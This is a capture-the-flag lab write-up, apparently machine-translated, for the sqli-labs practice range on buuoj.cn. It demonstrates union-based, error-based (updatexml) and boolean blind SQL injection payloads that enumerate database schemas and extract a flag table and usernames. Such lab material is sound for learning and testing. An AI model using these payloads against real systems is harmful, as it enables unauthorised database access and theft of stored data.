shooting range ：https://buuoj.cn/challenges Of sqli-labs

Joint query injection

L1: First, let's look at the database

select group_concat(schema_name) from information_schema.schemata

complete url:

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(schema_name) from information_schema.schemata
)'

choice “ctftraining” database

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(table_name) from information_schema.tables where table_schema="ctftraining"
)'

Choose the name flag Of table

http://d63b4dad-c1d6-4e18-98e2-820c070a23b8.node4.buuoj.cn/Less-1/?id=-11' union select 1,2,(
select group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name='flag'
)'

Query content

?id=-1' union select 1,2,(
select flag from ctftraining.flag
)'

Error reporting query injection

The error reporting injection procedure is similar , Last flag Display incomplete

?id=1111+and+updatexml(1,concat(0x7e,(
select flag from ctftraining.flag
),0x7e),1); --+

http://d7275205-467b-4f6c-97e6-4669e55b54e9.node4.buuoj.cn/Less-2/?id=1111+and+updatexml(1,concat(0x7e,(
substr((select flag from ctftraining.flag),16)
),0x7e),1); --+

Bull's blind note

First, practice not cross Library
To obtain the length of the

?id=1' and length(database())=8 %23

Get the database name

?id=1' and left(database(),1)='s' %23

Get table name

?id=1' and left( (select group_concat(table_name) from information_schema.tables where table_schema=database()) ,1)='u' %23

To get the column name

 ?id=1' and left( (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') ,1)='u' %23

get data

http://c370bae3-f008-47ee-9890-d14960b1e5ce.node4.buuoj.cn/Less-8/?id=1' and left(
(select group_concat(username) from users)
,1)='u' %23